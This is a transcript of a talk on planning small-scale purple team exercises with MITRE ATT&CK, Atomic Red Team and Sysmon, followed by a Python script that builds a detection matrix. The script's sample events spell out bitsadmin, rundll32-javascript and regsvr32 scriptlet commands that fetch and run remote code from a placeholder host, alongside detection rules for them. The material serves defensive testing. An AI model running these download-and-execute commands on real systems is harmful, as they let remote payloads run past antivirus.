
I'm a retired Colonel of the Greek Armed Forces. I have worked in the IT operations area since 2002, and in 2008 I joined the Cyber Defense Directory, where I gained my expertise and my background in the cyber security domain. Part of my experience is cyber security operations in multiple forms, both offensive and defensive, and of course planning, coordinating and executing cyber defense exercises. I insist on that because it has to do with the content of the presentation. In 2017, when I retired, I changed career path from the public sector and the defense forces to the challenging private sector, and I'm really happy that I had the opportunity to try my skills and my knowledge and to put effort into this very challenging sector. So, since last year I have been with Digital Shadows, a cyber threat intelligence and digital risk monitoring company providing business services for big vendors; of our clients, 50% are banks, funding and so on. My expertise, as part of the security engineering and research team, is adversary simulation and TTP analysis, purple team exercises, security monitoring and, recently, internal security architecture.

What we will see today is purple team exercises. The purple team term has already been mentioned during the previous talks, and pretty much everyone is familiar with it. The term purple team is getting more and more popular, because over the past years, doing different security assessments like penetration tests, vulnerability assessments, red teaming and so on, we found, the security community found, that the most efficient and valuable way for blue teams, for the clients of pen testers and red teamers, is to do something in combination. So what we are here to do today is to examine the topic from what perspective? Cyber security exercises are a great way to improve your security. We are talking about purple teaming, but the point is to put it in a more formal way, in a cyber defense exercise, because this can be used as part of your, of our, ISMS program to trigger, to boost additional security improvements, measures, controls, countermeasures, and to buy security stuff, to improve the security budget. That's the world out there.

Red teaming is currently the advanced way to simulate cyber attacks, already covered. Blue teaming is always the main exercise objective, which is what? Catch the reds. This is the objective every time. Purple teaming comes to combine all the above in a win-win approach. So the challenge here is what? How can we make it part of our information security management program and not just a detection test? How can we plan and execute it on a small scale without advanced expertise? Red teaming is good, purple teaming is good, but it is expensive to hire the right people, the team, to do a large-scale red team exercise and to report and find everything. The point here is how, with our own resources, we can do small tests in the format of a purple team exercise, to formalize the results and to improve and justify our recommendations or requirements or requests for security tools and technology.

Terminology, from Wikipedia. Okay, we have seen a lot of different definitions. A red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role or point of view. So red teaming is not only about not getting caught, but also about acting as an adversary. That's why threat intelligence has now been raised and has shared a lot of information around adversaries' tactics. In order to achieve what? To give the blue teams, to give the exercise objectives, the needed information to conduct exercises close to reality, close to the real world.
A blue team is a group of individuals who perform an analysis of information systems, identify security flaws, verify the effectiveness of security measures and make certain that all security measures will continue to be effective after implementation. Pretty much crystal clear; we don't need more comments on that. A purple team is a combination of both, where existing red and blue team members work together. So the term purple team does not introduce a new team. Actually, it is a process that joins members of both teams to work together and gain the most value out of a purple team exercise, out of a cyber defense exercise.

What is a cyber security exercise? Most of us are very familiar with it, but we all know that especially here in Greece, Panoptis is the annual cyber defense exercise coordinated and organized by the Ministry of Defense. I was part of this exercise even from the first one, during my years in the MOD. But as far as I know it is the only cyber defense exercise here in Greece, and I don't know of any smaller-scale exercise. And the fact that this exercise is so popular means that anyone, everyone in the security community, needs the concept of a cyber defense exercise to get trained, to prove things, to improve their skills. Why do we need a cyber defense exercise? To test and exercise plans, processes and procedures. What plans, processes and procedures? The IT security, the cyber security plans, processes and procedures. This is what cyber exercises, and in general the military community's exercises, are always organized for. How? There are these five key stages: Plan, Prepare, Execute, Report and Lessons Learned. And this is the path the presentation will follow, to help us understand the concept of doing a purple team exercise with our own resources or with minimal assistance.

Purple team exercises, what do they require? Red team expertise, hard to find in the market and very expensive. Blue team expertise; again, this is something very, very challenging, because most of the time IT and security do not have the time to test their detection capabilities and the effectiveness of the security measures. Exercise planning: who has the skills and qualifications to plan an exercise in the background? Budget, expensive, and time.
Who has much time, enough time, to do something in addition, on top of his or her current information security program? What are the red team requirements now? Attack framework, tools, human resources, expertise, preparation, time, attack plan. We see some things here that are really, really important, necessary for a team, but from those requirements we can identify those that can be covered with our own resources. That's the purpose. Okay, I do not want to underestimate the value of advanced or sophisticated red teaming and red team exercises; don't confuse the concept with that. We don't replace the value of a large-scale red team exercise. We just want to adjust it to a smaller scale, in a more frequent way, and approach something that can improve our security posture.

Blue requirements: the incident response plan is the main plan that is being tested during every cyber security exercise. Security controls, monitoring capabilities and detection capabilities; this is where we often suffer because of the large scale of false positives and other issues. Response capabilities and the security response skill set: even if we have a dedicated incident response team, we need a response plan and a skill set. And applied security policies: do we have a policy associated with detection and monitoring, and who is responsible to respond, etc.?

The problems. The red problem: the attack kill chain is complicated. Very frequently the red teams make use of the popular attack kill chain, which is actually, we will see the stages later, how an adversary, how an attack campaign normally takes place: what the phases are from reconnaissance to data exfiltration, how an attacker can gain access, and what the phases during that campaign are to achieve its targets. Many different tools and techniques are applied. It is hard to plan and design attacks. Advanced expertise is needed for execution. We need tools, we need resources. Time limitations and budget limitations. Again, I'm talking about the red problem in-house, not about the already expert red teams.

The blue problem: not enough preparation time available. We don't have enough time to prepare for a specific cyber defense exercise; it is hard to find free time for every IT support or security person. IT or blue team not available, lack of experience. When I say IT or blue team, I'm talking about the incident response team. Okay, lack of a response plan or capabilities. Testing exercise environment not available: when we are doing cyber defense exercises, when we are participants in cyber defense exercises, we are used to having access to a cyber range, to a testing framework, to a testing machine, to a testing environment to do stuff. In our organizations we don't have such a capability, so we have to find a way to test things on a smaller scale. Time limitations and budget limitations, always. Wrong button, sorry.

And the purple problem, the greatest of all. Okay, in this image you see the concept behind red and blue. Red: I will own you. Blue: I will catch you, or I will make you cry. What is the purple problem? To make those enemies work together. Okay, get reds and blues together in a common effort to improve what? To improve the cyber security posture of the blues. Don't forget, the reds' clients are the blues, right? These are who they are working for. Okay, so it is, let's say, it should be by default, by definition, the right way of approach.

The planning phase. Where to start from in order to organize a purple team or a cyber defense exercise? We need those things. Define the exercise objectives: what exactly, what process, what plan I want to test, or what people, what resources, what measures, what technology. Define the involved entities. There's no need for a full-scale exercise; we don't necessarily need to organize an exercise that engages the entire organization. Small parts each time. Define the attack scenario to be based on. Select the associated tactic for the attack scenario. And this now is how we will solve the red problem, in the following ways. Select one or more techniques according to the available time and expertise. We said before that a red team normally represents or replicates an already existing, known adversary attack method. So what we want from our side is to replicate red teaming techniques and tactics, to replay those scenarios. Define the target security controls and processes. We don't need to engage the entire, the whole sensor set across the company or the organization. Okay, we can limit the target to small pieces. Prepare the testing boxes and communicate the exercise. This is the key part. We try, and the message is, to evolve from the custom, from the normal weekly or monthly detection lab or detection test, to a more formal, let's say quarterly, purple team exercise, where our detection tests will be communicated and escalated properly to the management for our requirements.

Recommended approach, red part. Attack framework: the MITRE ATT&CK framework. It's a relatively new framework, since last year, that tries to map all the techniques already recognized by the community, identified by several analyses of APT attacks, attack reports and anything else, in a way that includes, that contains, every known technique and tactic that adversaries normally use. Automated adversarial simulation: this is something more advanced, it is a next step. The Caldera framework tries to do exactly this, to automate not just one selected technique or attack but a chain of techniques or tactics used from a start point to a specific end point. Prepare only the associated security controls, with IT support and by enabling monitoring or the SIEM for the specific part, section. We can use a spare laptop, and we will see how we can do that to do a small-scale exercise.

And a couple of words on the ATT&CK framework. Who knows the ATT&CK framework? The MITRE ATT&CK framework. Okay, it seems that it's not very popular. This is the wiki page. Please go there; you will find very valuable information on attack tactics and techniques. Most of them are there. Of course there are also other custom or not-yet-identified techniques, but this is a very good starting point for every security professional, for every IT or blue team, to see what techniques and tools attackers use. Because what Dimitris actually very successfully described before, okay, an APT actor, is something that really exists, but here you can see a lot more.

Feasible approach: select one tactic each time. We don't need to test everything from reconnaissance to data exfiltration. Just focus on one tactic. One tactic with pre-selected associated techniques and tools can be prepared easily. Make use of the available simulation frameworks. And this is the second part that is actually really, really useful. We have the ATT&CK framework, but we have another tool that will help us make this feasible. Several limitations may apply: we may not have a command and control simulation, we may not even have exploitation, but we have to simulate specific parts of the scenario and focus on the things that we need to test. Basic security controls can be tested and evaluated efficiently, and this is our goal: start from the basics. The testing environment can be a spare laptop or workstation reflecting or representing an average user joining the corporate network. We don't need a cyber range. Even a laptop properly configured and prepared with a test user by IT support, given to the team, to the IT security team, to the IT security specialist, to one guy to do the test, is more than enough for this limited-scale exercise. And of course monitoring, detection, response and many more are the testing scope. This is the main part that we need to test. Okay, the point is that it's easier to test the perimeter, the web application and so on, but where the organization suffers is the internal security measures to mitigate lateral movement and other techniques that take place inside the network. This is a sensitive point. Those are the tactics that are described in detail in the ATT&CK framework.
You see, we start from initial access, execution, persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, collection, exfiltration and command and control. Recently the ATT&CK framework has been expanded with the PRE-ATT&CK framework, where you can find a list of tactics for the phase before initial access, including reconnaissance and so on. As an example, the one I used for my testing, the defense evasion tactic can be used. For example, here we can see that the defense evasion tactic alone has 57 different techniques, okay? Each technique is described accordingly, and the following step is what? We have the ATT&CK framework, but somebody would say, okay, and where will I now find the tools and the techniques to simulate the adversary? We have the Atomic Red Team, which is a project, a new project, that actually does what? It maps the ATT&CK framework to tools, techniques and commands that can be just copied and pasted into my environment to do some basic tests. We see how those are mapped, okay, each technique with the associated test. As a next step, we can select the techniques for the selected tactic. In this example we selected four different techniques. The approach for blue and red I will skip; okay, it is something that has already been stated, but now, in the preparation phase, it is the time for review and checks of the controls. I will skip the preparation, because what I want to show you here is what I used for the testing, and this is something that is also recommended for a small-scale exercise. You can start even from a Windows 10 Professional laptop that joins the network with the default antivirus, Windows Defender, if there is nothing else existing. Initial logging is the default; I will go straight to the next logging system, which is Sysmon, already mentioned by Dimitris before as a very valuable and efficient way for detection. And since almost every antivirus and EDR can be bypassed, logging is our last way of detecting and mitigating the threats.

Okay, and just to give you a couple of examples from the execution phase and how those tools or commands can be executed. One example is BITS jobs, the Windows Background Intelligence Service, which can be used as a file transfer mechanism. Adversaries may abuse BITS to download, execute or even clean up after malicious code. This is the test that is described in the Atomic Red Team framework. This is the command and this is the result. Apologies for not being clear; you will see that in more detail in the slides. The point is that we managed to download and execute putty.exe directly from the website. This is what Sysmon has detected as a new process created. Okay, and the valuable thing, the key part here, is, okay, we see that many processes can be detected as newly created. The point with the already existing intelligence, part of the techniques that are being exposed, is that we can create, we can improve, our rules, because those techniques are not random; they have somehow been detected in the past, identified during previous attacks, and that's the value.

This is indirect command execution. I will not stand here. I will stand here to see a very useful example. I don't know if you're familiar with the rundll32 technique of executing commands. Here we can see, already available on the site, how we can execute JavaScript to remotely download and execute something. This is the ready-to-go command from the site, and this is the result. Mind here that Windows Defender detected the download and execution of this script, but actually what it does is to try to download and execute the calculator from the Atomic Red Team website. The interesting part here, where you can see the value of different techniques, is that with this technique, the fourth one, regsvr32, a command line program used to register and unregister object linking and embedding controls; okay, these are the descriptions from the site. These are, here you can see, the commands, okay, pretty trivial. You can see here how the script is executed locally, successfully, and how Sysmon detects it. And here, this is also the interesting part, regsvr32 downloading and executing the T1085 script. You see, this is a different technique. This is a technique that was used before by rundll32. Before, with rundll32, it was detected, but now with a different technique it is not detected by Windows Defender, which means that those techniques really exist, have been used and may still be used by attackers. And this is how we can evaluate, okay, whether a technique, a specific technique belonging to a specific tactic, can work or not. The other useful thing here is that besides the process creation, we also have the network connection, detected by Sysmon again, for the attempt to download and execute the file from the remote resource.

What is useful to do during a purple team exercise, and with this I will conclude my presentation, is that we need to develop a table, a matrix, with the tactics, the techniques used, what tools we have used and the measures, the controls, that we have used in parallel with the red team. This actually reflects the collaboration, the red and blue team working together. On the left part, usually, we have the red team tactics, attempts, activities, and on the right part, the right columns include what the blue measures, the controls, did during each tactic, each technique. And here we see the tools, the commands that we used, whether the AV detected it or not, what happened from a logging perspective and, if applicable in a more advanced exercise, what alert has been generated by our SIEM or log management tool, and what response has been triggered and completed or not during the response phase of the cyber defense exercise.

Next steps, improvements: Caldera, a very good framework for automation of the techniques that we described before. And attack playbooks, a new effort to try to emulate adversaries' plans, meaning from the beginning to the end state: which tools and techniques in a specific playbook can be described in an adversary's campaign attack. There is already a prepared one, ready for you, for all of us, to use as a reference: the APT3 Adversary Emulation Plan. Okay, and we can see here that there is additionally the manual, where in the XLS file we can see all the tactics and tools that have been used, and here, in the more user-friendly playbook viewer format, by Unit 42, the threat intelligence company. Next steps, of course, could include, okay, the more advanced tools. We will not skip them; still, we can use Metasploit, Empire, Cobalt Strike, okay, where available, but this raises the expertise requirements and expectations from the red team. And automated response is also something that, as a next step, can be used to improve and test.

Key takeaways. Okay, what we need to remember today, after today. Use purple team exercises to identify the security gaps; already told many times, it's really, really useful. Improve your detection and response capabilities. Use publicly available tools and frameworks that make the planning and execution easier. This is the key message: there are tools, there are frameworks, there are ways to make limited exercises and formalize the results of a detection test. Prove the value of the gap of your security controls. This is why we make the test. It's not something written that, okay, there is that vulnerability that might expose my asset, my data, whatever. Here we have metrics, and this is what is valued most of the time by management. We can build metrics and measure the effectiveness of our security controls. Trigger or boost your ISMS program. Make small cyber, purple team exercises part of your program to improve the way you justify, you request, security controls and measures. And keep it short and simple. We don't need only... It's very good to have an annual full-scale cyber war game, defense exercise and so on. Okay, but we can make it in a more limited, controllable way, short, simple, and it's time to build more and more on top of that. Thank you.
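The red/blue results matrix the talk closes with, as an added example that is not part of the presentation: a small Python script that takes constructed Sysmon-style process-create (Event ID 1) and network-connect (Event ID 3) events for the three execution-phase tests discussed (BITS jobs, rundll32 with JavaScript, regsvr32 with a remote scriptlet), applies the blue side's detection predicates, and renders the technique/tool/AV/logging table. The event contents, the rule logic, the placeholder URLs and the AV column are assumptions for illustration, not the speaker's logs or rules.

```python
"""Red/blue results matrix for a small purple-team test, built from Sysmon-style
events. Constructed illustration: events imitate Sysmon Event ID 1 (process
create) and ID 3 (network connect) as simplified dicts; predicates, AV column
and URLs are this example's own, not the talk's logs or a vendor ruleset."""
import re

URL = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)  # URL inside a command line

# Constructed sample events (not real logs); notepad is a benign control.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline":
     "bitsadmin /transfer job /download /priority high http://example.test/putty.exe C:\\tmp\\putty.exe"},
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe", "cmdline":
     'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";GetObject("script:http://example.test/calc.sct")'},
    {"id": 1, "image": r"C:\Windows\System32\regsvr32.exe", "cmdline":
     "regsvr32.exe /s /u /i:http://example.test/T1085.sct scrobj.dll"},
    {"id": 3, "image": r"C:\Windows\System32\regsvr32.exe", "dest_ip": "203.0.113.10", "dest_port": 80},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

def _is(e, exe):
    return e["image"].lower().endswith(exe)

# Detection rules: (technique, tool, predicate over a process-create event).
RULES = [
    ("BITS Jobs", "bitsadmin.exe",
     lambda e: _is(e, "bitsadmin.exe") and "/download" in e["cmdline"].lower()
     and URL.search(e["cmdline"]) is not None),
    ("Rundll32 (indirect command execution)", "rundll32.exe",
     lambda e: _is(e, "rundll32.exe") and "javascript:" in e["cmdline"].lower()),
    ("Regsvr32 (remote scriptlet)", "regsvr32.exe",
     lambda e: _is(e, "regsvr32.exe") and "scrobj.dll" in e["cmdline"].lower()
     and URL.search(e["cmdline"]) is not None),
]

# AV column recorded by the blue side (constructed, following the talk's outcome:
# Defender flagged the rundll32 test but not the regsvr32 one).
AV_RESULT = {"bitsadmin.exe": False, "rundll32.exe": True, "regsvr32.exe": False}

def evaluate(events):
    """One matrix row per technique: AV result plus what Sysmon would show."""
    rows = []
    for technique, tool, match in RULES:
        procs = [e for e in events if e["id"] == 1 and match(e)]
        net = [e for e in events if e["id"] == 3 and _is(e, tool)]
        urls = {m.group(0) for e in procs if (m := URL.search(e["cmdline"]))}
        rows.append({"technique": technique, "tool": tool,
                     "av_detected": AV_RESULT.get(tool, False),
                     "sysmon_process": bool(procs), "sysmon_network": bool(net),
                     "urls": sorted(urls)})
    return rows

def render(rows):
    """Plain-text matrix: red activity on the left, blue results on the right."""
    hdr = f"{'Technique':40} {'Tool':14} {'AV':6} {'Proc':6} {'Net':6} URL"
    out = [hdr, "-" * len(hdr)]
    for r in rows:
        out.append(f"{r['technique']:40} {r['tool']:14} {str(r['av_detected']):6} "
                   f"{str(r['sysmon_process']):6} {str(r['sysmon_network']):6} "
                   f"{', '.join(r['urls'])}")
    return "\n".join(out)

if __name__ == "__main__":
    print(render(evaluate(EVENTS)))
```

The AV column is deliberately an input rather than something the script computes: in a purple team exercise it is the blue team's recorded observation, and the matrix then shows side by side where the AV was silent but logging still caught the process or the outbound connection.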